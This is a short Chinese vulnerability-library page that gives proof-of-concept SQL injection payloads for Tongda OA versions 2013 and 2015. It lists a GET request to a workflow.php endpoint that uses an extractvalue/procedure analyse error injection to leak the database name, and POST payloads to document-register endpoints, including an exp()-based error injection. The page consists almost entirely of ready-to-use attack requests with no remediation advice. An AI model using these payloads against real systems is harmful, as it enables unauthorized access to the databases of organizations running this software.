通达oa sql注入-漏洞文库小世界-安全文库-NGC660 安全实验室

通达oa sql注入

通达oa sql注入

漏洞影响

2013、2015版本

复现过程

poc

http://url/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extrac tvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random

http://url/general/document/index.php/recv/register/turn    

post(_SERVER=&rid=1')
http://url/general/document/index.php/recv/register/insert  

post:   
title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=
请登录后发表评论

    请登录后查看回复内容